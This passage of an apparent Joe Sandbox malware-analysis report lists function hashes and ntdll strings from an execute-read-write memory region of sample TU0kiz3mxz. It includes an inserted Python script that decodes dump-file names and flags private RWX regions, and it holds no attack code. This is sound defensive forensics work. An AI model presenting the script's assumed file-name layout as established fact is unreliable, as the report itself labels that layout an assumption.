• Instruction ID: 6ec35449439df6366f94fec8566b0ee965970dc0b6282e12473d8c69a02d0df5
• Opcode Fuzzy Hash: 336711d991a7d5b804dc5397dbcb25f8067e8f516a1f2ac9b84d5ace1bf08c5b
• Instruction Fuzzy Hash: 0E900232645800139144715859845469005A7E1301B55C021E0425554CCB148A565361
Memory Dump Source
• Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 94c46c9aa6db852f567e6040c08504f5736a730b9eef307f468f32d28184449a
• Instruction ID: 82ccc2b3fa0c1030cfe64393dba005efcba6c4be80408e0bc750da9cd9f3b995
• Opcode Fuzzy Hash: 94c46c9aa6db852f567e6040c08504f5736a730b9eef307f468f32d28184449a
• Instruction Fuzzy Hash: 3F90026264150043414471585904406B005A7E2301395C125A0555560CC71889559369
Memory Dump Source
• Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2661a12015ab8e791fa8ab491730d49148a19d7b7b0c3a2ce83b8e22292defae
• Instruction ID: ff12f416a7574b72802b2f7718b4ce3e5a0856b1c7c290d9faea54c10fbf0769
• Opcode Fuzzy Hash: 2661a12015ab8e791fa8ab491730d49148a19d7b7b0c3a2ce83b8e22292defae
• Instruction Fuzzy Hash: 9390023224140803D10871585904686500597D1301F55C021A6025655ED76589917231
Memory Dump Source
• Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 568af7d27fb556a5a731716940bec982d98acbaedc2f1392601c4a6edefd1f7b
• Instruction ID: 550810e239b6f4b896545221ce01addd27b3723161648bd3776f7040be106d7b
• Opcode Fuzzy Hash: 568af7d27fb556a5a731716940bec982d98acbaedc2f1392601c4a6edefd1f7b
                                                                                                                      • Instruction Fuzzy Hash: 7D90043374540C03D154715C55147475005D7D1301F55C031F0035754DC755CF5577F1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1b2f64c39ece18165fa99610b6d1ed4522c736752b10eedcdb90fa9037a29eae
                                                                                                                      • Instruction ID: 97877d6c91219591bd12e7d1dd2b4eac425d77bcdf2bdc6e0c3c4c335419a7e2
                                                                                                                      • Opcode Fuzzy Hash: 1b2f64c39ece18165fa99610b6d1ed4522c736752b10eedcdb90fa9037a29eae
                                                                                                                      • Instruction Fuzzy Hash: F590023224544843D14471585504A46501597D1305F55C021A0065694DD7258E55B761
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fc860519aa00df43a2a73c607d944888fcc2f84d36e6c6ce6bf7f6fcb9593392
                                                                                                                      • Instruction ID: c9c530cb973e42d95beb1f9e224c5bf2cd66ff089d1ff0983ff058172db95bbe
                                                                                                                      • Opcode Fuzzy Hash: fc860519aa00df43a2a73c607d944888fcc2f84d36e6c6ce6bf7f6fcb9593392
                                                                                                                      • Instruction Fuzzy Hash: 799002A2241540934504B2589504B0A950597E1201B55C026E1055560CC72589519235
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2f1d5078d01bd52d9d0181bd0efcc163ba2b31800a71a432d461cc0e37b7ff04
                                                                                                                      • Instruction ID: dc4be5a693b4d38fe544e53a4140bcc043192ba89b111bd58d33c8bb7d61e163
                                                                                                                      • Opcode Fuzzy Hash: 2f1d5078d01bd52d9d0181bd0efcc163ba2b31800a71a432d461cc0e37b7ff04
                                                                                                                      • Instruction Fuzzy Hash: 33900226261400030149B558170450B5445A7D7351395C025F1417590CC72189655321
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9679a6bc2eb015a7cc0f030e7cd8a0885b52ee20e17825562b0800319facff9d
                                                                                                                      • Instruction ID: 5f2916861beb95296237e69b3f49abf2fdbefe9067a16957191b3f721cebb7a5
                                                                                                                      • Opcode Fuzzy Hash: 9679a6bc2eb015a7cc0f030e7cd8a0885b52ee20e17825562b0800319facff9d
                                                                                                                      • Instruction Fuzzy Hash: EA90022224544443D10475586508A06500597D1205F55D021A1065595DC7358951A231
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e15ab511638d6faeeb164fbc3d1788ac82d6f20eb0e222b98b802bf06d11c3a3
                                                                                                                      • Instruction ID: 787a4aed12bf7886bc9b8e06d57cbdc5523ab0a3adac16be8efa15ad27a44121
                                                                                                                      • Opcode Fuzzy Hash: e15ab511638d6faeeb164fbc3d1788ac82d6f20eb0e222b98b802bf06d11c3a3
                                                                                                                      • Instruction Fuzzy Hash: D990023228140403D145715855046065009A7D1241F95C022A0425554EC7558B56AB61
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 140ef87a71b8bd9cb3d6ea81f3ef33a29c003097398c5084fa9ca7dc17a50c8f
                                                                                                                      • Instruction ID: 29aac188d4509ca1455d9230fb1b47e64c9571f2110d82886d50a520443d1671
                                                                                                                      • Opcode Fuzzy Hash: 140ef87a71b8bd9cb3d6ea81f3ef33a29c003097398c5084fa9ca7dc17a50c8f
                                                                                                                      • Instruction Fuzzy Hash: 4290023224140843D10471585504B46500597E1301F55C026A0125654DC715C9517621
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 411603b48dd9f13e37b6dfcc4f42456c3bbc9a3b015660145767c38dacf357c0
                                                                                                                      • Instruction ID: 78b2b9eb1fa237f2233a76ef59166e54f4543b95492a79e5a7cdf39602d61080
                                                                                                                      • Opcode Fuzzy Hash: 411603b48dd9f13e37b6dfcc4f42456c3bbc9a3b015660145767c38dacf357c0
                                                                                                                      • Instruction Fuzzy Hash: 2490022264540403D14471586518706501597D1201F55D021A0025554DC7598B5567A1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e34036a6a2e3dc16af5f10b3e1ba5fde9e43959072de65fc822bd6fae6735708
                                                                                                                      • Instruction ID: 0030b9bab048ce429ce0b2db464ba6e72d8b04f5760cf4fb8c5a25ae1b3739fe
                                                                                                                      • Opcode Fuzzy Hash: e34036a6a2e3dc16af5f10b3e1ba5fde9e43959072de65fc822bd6fae6735708
                                                                                                                      • Instruction Fuzzy Hash: C890023224140403D10471586608707500597D1201F55D421A0425558DD75689516221
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6d02b82c094903734084a83522eb6cd27ac412df20db90b30235e37dbf3ef38c
                                                                                                                      • Instruction ID: fe62917135f8277d9370e2283f53a642b8ca8257623bdac97aaefa987288aa54
                                                                                                                      • Opcode Fuzzy Hash: 6d02b82c094903734084a83522eb6cd27ac412df20db90b30235e37dbf3ef38c
                                                                                                                      • Instruction Fuzzy Hash: F590026225140043D10871585504706504597E2201F55C022A2155554CC7298D615225
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 77c118963d2624c084ae15b8ddab0dace5dda42368adcba20b4766eea79810f5
                                                                                                                      • Instruction ID: 0abadae0f4569bb43f76ed64f639660d3f1e436cea46ca5ba693624b40bf1b03
                                                                                                                      • Opcode Fuzzy Hash: 77c118963d2624c084ae15b8ddab0dace5dda42368adcba20b4766eea79810f5
                                                                                                                      • Instruction Fuzzy Hash: D390023224180403D10471585908747500597D1302F55C021A5165555EC765C9916631
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ccff097e4dc6e6e6f837f8bfdb6ea8e1451c23d1d0594d74debb15377342b065
                                                                                                                      • Instruction ID: b558e018a7cac82cbb0d2a815f6ceca0e96e51e2a280bc2d74cf56e17785a3ff
                                                                                                                      • Opcode Fuzzy Hash: ccff097e4dc6e6e6f837f8bfdb6ea8e1451c23d1d0594d74debb15377342b065
                                                                                                                      • Instruction Fuzzy Hash: F290022234140403D106715855146065009D7D2345F95C022E1425555DC7258A53A232
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e3126dfd2dfcab96e38fac551984f32555fdf4115e7ff6f8f9c23ab15d1845e4
                                                                                                                      • Instruction ID: 135fc5a81e36f4d6afc4f03d69dfd01745a101aff359b5fb7dd1bc3f595d7a86
                                                                                                                      • Opcode Fuzzy Hash: e3126dfd2dfcab96e38fac551984f32555fdf4115e7ff6f8f9c23ab15d1845e4
                                                                                                                      • Instruction Fuzzy Hash: 8790026224180403D14475585904607500597D1302F55C021A2065555ECB298D516235
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c2f6e64b4a47feaa60a8627b593e6438c3e4bf40225855da5d28cb478a300814
                                                                                                                      • Instruction ID: ba2ee439b051f058ac9b72c3befa8ba3ead4d6deb9d92c922ae926c20d4b3b33
                                                                                                                      • Opcode Fuzzy Hash: c2f6e64b4a47feaa60a8627b593e6438c3e4bf40225855da5d28cb478a300814
                                                                                                                      • Instruction Fuzzy Hash: 3A90022224184443D14472585904B0F910597E2202F95C029A4157554CCB1589555721
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 24b57115ff2b8623ef7bdf8deb69003de406a28ef06cc4559150d4375119cd93
                                                                                                                      • Instruction ID: 9ff1019f4df565ef91e79f655176ada9e6cf997fc154deb8236911a6644cdc5b
                                                                                                                      • Opcode Fuzzy Hash: 24b57115ff2b8623ef7bdf8deb69003de406a28ef06cc4559150d4375119cd93
                                                                                                                      • Instruction Fuzzy Hash: 6C90022228140803D144715895147075006D7D1601F55C021A0025554DC7168A6567B1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 243f437fd13e197d57897f8e78dc2229ca4981a93fad5f86683242223b1897a0
                                                                                                                      • Instruction ID: 55df88d00419f574049992b3107e915872bca788882001add47234a10ace856d
                                                                                                                      • Opcode Fuzzy Hash: 243f437fd13e197d57897f8e78dc2229ca4981a93fad5f86683242223b1897a0
                                                                                                                      • Instruction Fuzzy Hash: 5390023264550403D10471585614706600597D1201F65C421A0425568DC7958A5166A2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8cd53e7c9bbfbf0876734f7bf2a8202224d1aebd3f7b48bb2fa6523422756a72
                                                                                                                      • Instruction ID: 74b9ef6855463ccaedf3495868ae146c0453b58f9c0941cad428be937e43eb05
                                                                                                                      • Opcode Fuzzy Hash: 8cd53e7c9bbfbf0876734f7bf2a8202224d1aebd3f7b48bb2fa6523422756a72
                                                                                                                      • Instruction Fuzzy Hash: 3990022228545103D154715C55046169005B7E1201F55C031A0815594DC75589556321
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 04e88cae0ce05dc008b693059aa2b89eceeb18fc97fb84e433be412c331ee26c
                                                                                                                      • Instruction ID: ebc52a100e29200ec724765ea6f91da961181937cb5dd548493885820925476b
                                                                                                                      • Opcode Fuzzy Hash: 04e88cae0ce05dc008b693059aa2b89eceeb18fc97fb84e433be412c331ee26c
                                                                                                                      • Instruction Fuzzy Hash: 1090023224240143954472586904A4E910597E2302B95D425A0016554CCB1489615321
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 49d1ca7000732afba8bb116fc7363c69f55132d1ec676e9e8da8ce1cf36ff0ba
                                                                                                                      • Instruction ID: d39b0ae3ab75aec6a77046b35bcff3b0f27c41bf8becacb4bd7af50c9717c1df
                                                                                                                      • Opcode Fuzzy Hash: 49d1ca7000732afba8bb116fc7363c69f55132d1ec676e9e8da8ce1cf36ff0ba
                                                                                                                      • Instruction Fuzzy Hash: 2490023624140403D51471586904646504697D1301F55D421A0425558DC75489A1A221
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                      • Instruction ID: 1ba76a7c44a8124a06d03aa55a5ac600dc89aa48237e38d5e859caaf06bfd800
                                                                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                      • Opcode ID: f71855fdfa298b446ecaa21e8c46ac482417c84bead8a16931c6042eade4d19a
                                                                                                                      • Instruction ID: fbf3b95a6427e36ca3ca0ef8e0a7a370e94793c7d415c7b8879e2a55fc7f33eb
                                                                                                                      • Opcode Fuzzy Hash: f71855fdfa298b446ecaa21e8c46ac482417c84bead8a16931c6042eade4d19a
                                                                                                                      • Instruction Fuzzy Hash: C351FBB5E00116BFCB1ADB5CC89497EFBF8BF48240714816AF595D7685E374DE4087A0
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                      • Opcode ID: b5a3c83794f819075fc8dbc748db04bbf19e4aa6610140fd0de71dbdfaf53352
                                                                                                                      • Instruction ID: 18996b3cf45ba46cd745311dad0b2e806d010b8bb2895075990dbbf11974460c
                                                                                                                      • Opcode Fuzzy Hash: b5a3c83794f819075fc8dbc748db04bbf19e4aa6610140fd0de71dbdfaf53352
                                                                                                                      • Instruction Fuzzy Hash: B151F571A04646AECB38DF5CC8909BFBBF8EB48204B148469F5D6D7741E7B4EA41C760
                                                                                                                      Strings
                                                                                                                      • Execute=1, xrefs: 01134713
                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 01134787
                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01134742
                                                                                                                      • ExecuteOptions, xrefs: 011346A0
                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01134725
                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01134655
                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011346FC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                      • API String ID: 0-484625025
                                                                                                                      • Opcode ID: f347a0758c9b40d87b30630c500b272e9fc4457a231cedf352f5856fb5028917
                                                                                                                      • Instruction ID: 41b98b34a775e4e636076482a87e7652e30a7b191adbf4f7e6ec7e6845f1cf4c
                                                                                                                      • Opcode Fuzzy Hash: f347a0758c9b40d87b30630c500b272e9fc4457a231cedf352f5856fb5028917
                                                                                                                      • Instruction Fuzzy Hash: 22511931A0021A6AEF25EBA8DC86FED77A8EF58704F0400EDD745AB5D1E7709A41CF52
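Added example, not part of the Joe Sandbox report. Every record above carries the same "Source File" identifier, and its numeric fields are the attributes of the memory region the functions were lifted from. The Python below parses that identifier and decodes the attributes. It assumes the three 8-digit fields after the base address are the Protect, State and Type values of MEMORY_BASIC_INFORMATION as returned by VirtualQuery; that is an assumption, but it is consistent with the values on this page (0x40 = PAGE_EXECUTE_READWRITE, 0x1000 = MEM_COMMIT, 0x20000 = MEM_PRIVATE) and with "Offset: 01090000". The first two fields are taken as process and snapshot indices, matching the "3_2" in the snapshot file name, also an assumption; the trailing field is left undecoded. The check it implements is the one a practitioner wants here: a private, committed, RWX region that the sandbox reports as "based on PE: true" and whose strings name ntdll ("CLIENT(ntdll): ...", "RTL: Enter CriticalSection Timeout ...") is worth dumping and comparing against the on-disk ntdll.dll rather than treating as a normal loaded module.

```python
"""Decode a Joe Sandbox .sdmp memory-dump name and flag private RWX regions.

Assumed name layout (derived from this report, not from Joe Sandbox documentation):
  <proc>.<snapshot>.<dumpid>.<base>.<protect>.<state>.<type>.<extra>.sdmp
"""

import re

# Page-protection constants from winnt.h; the base protection is one-hot in the low byte.
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_STATES = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPES = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}

# Identifier repeated in this report section (process 3, snapshot 2, base 0x01090000).
SAMPLE_SDMP = "00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp"
# Constructed counter-example: an image-backed, execute-read region (not from the report).
CONSTRUCTED_IMAGE_SDMP = "00000003.00000002.1763936313.0000000077000000.00000020.00001000.01000000.00000000.sdmp"

# Assumed field layout; proc/snapshot are read as decimal, the rest as hexadecimal.
SDMP_RE = re.compile(
    r"^(?P<proc>\d{8})\.(?P<snap>\d{8})\.(?P<dumpid>\d+)\."
    r"(?P<base>[0-9a-fA-F]{16})\.(?P<protect>[0-9a-fA-F]{8})\."
    r"(?P<state>[0-9a-fA-F]{8})\.(?P<type>[0-9a-fA-F]{8})\.(?P<extra>[0-9a-fA-F]{8})\.sdmp$"
)


def decode_sdmp(name: str) -> dict:
    """Parse a .sdmp file name into the memory-region attributes it encodes."""
    m = SDMP_RE.match(name)
    if m is None:
        raise ValueError(f"not a recognised .sdmp name: {name!r}")
    protect = int(m["protect"], 16)
    base_prot = protect & 0xFF
    state = int(m["state"], 16)
    mtype = int(m["type"], 16)
    return {
        "process": int(m["proc"]),
        "snapshot": int(m["snap"]),
        "base": int(m["base"], 16),
        "protect": protect,
        "protect_name": PAGE_PROTECTIONS.get(base_prot, f"0x{base_prot:02x}"),
        "modifiers": [n for bit, n in PAGE_MODIFIERS.items() if protect & bit],
        "executable": base_prot in EXECUTABLE,
        "writable": base_prot in WRITABLE,
        "state": state,
        "state_name": MEM_STATES.get(state, f"0x{state:x}"),
        "type": mtype,
        "type_name": MEM_TYPES.get(mtype, f"0x{mtype:x}"),
    }


def is_private_rwx(info: dict) -> bool:
    """Committed, private (neither file- nor image-backed), writable and executable:
    the usual shape of an unpacked payload or a manually mapped module."""
    return (
        info["state"] == 0x1000
        and info["type"] == 0x20000
        and info["executable"]
        and info["writable"]
    )


def triage(names):
    """Return the decoded records that warrant a closer look, in input order."""
    return [info for info in map(decode_sdmp, names) if is_private_rwx(info)]


if __name__ == "__main__":
    for name in (SAMPLE_SDMP, CONSTRUCTED_IMAGE_SDMP):
        info = decode_sdmp(name)
        verdict = "PRIVATE RWX, dump and inspect" if is_private_rwx(info) else "ordinary"
        print(f"proc {info['process']} snap {info['snapshot']} base 0x{info['base']:08x}: "
              f"{info['protect_name']} {info['state_name']} {info['type_name']} -> {verdict}")
```

Running the block prints one line per name; the report's own identifier decodes to PAGE_EXECUTE_READWRITE / MEM_COMMIT / MEM_PRIVATE and is flagged, while the constructed image-backed region is not. If a future report turns out to use a different field order, only SDMP_RE needs changing; the decoding tables are plain winnt.h constants.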
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __aulldvrm
                                                                                                                      • String ID: +$-$0$0
                                                                                                                      • API String ID: 1302938615-699404926
                                                                                                                      • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                      • Instruction ID: eeabe8a47d1a83e4402f02411c66318af36769c037ee9d8236b48dcdc7247f79
                                                                                                                      • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                      • Instruction Fuzzy Hash: 1781D378E092498EEF2FCE6CC8517FEBBB1AF45320F18455AD861A72D1C7B48940CB59
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
